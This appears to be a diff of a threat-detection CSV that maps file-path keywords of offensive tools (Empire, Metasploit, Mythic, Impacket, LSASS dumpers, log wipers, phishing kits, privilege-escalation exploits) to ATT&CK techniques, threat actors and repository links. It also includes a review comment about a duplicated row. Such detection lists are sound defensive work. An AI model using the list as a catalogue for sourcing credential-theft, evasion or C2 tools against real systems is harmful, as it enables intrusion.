Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*/evilqr.git*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*/evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" -"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*/EvtMute.git*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" -"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*/ExcelDocWriter.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe2powershell*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" 
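Review bot: The keyword `"*/exe_to_dll.git*"` appears twice in the context rows of this hunk with the same link but different descriptions, technique lists, categories ("Defense Evasion" vs "Exploitation tools") and severity scores ("5" vs "8"). A consumer that keys rules on the keyword column will either emit two alerts for one match or keep whichever row it reads last, so the severity a detection carries becomes order-dependent. Since this commit only refreshes the star and date columns, the duplicate survives unchanged. Merging the two rows into one with a single agreed severity and category, or adding a uniqueness check on `keyword` to the generation step, would remove the ambiguity.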
@@ -3558,64 +3571,65 @@
 "*/exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*/expl/expl.go*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z"
 "*/exploit.cron.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/exploit.ldpreload.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/exploit_orw.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
-"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
 "*/exports_function_hid.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
 "*/ExternalC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
 "*/ExternalC2/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
-"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z"
+"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z"
 "*/f5_bigip_tmui_rce.rb*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z"
 "*/Fa1c0n35/zabbix-cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z"
-"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
 "*/fakelogonscreen*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z"
-"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
+"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
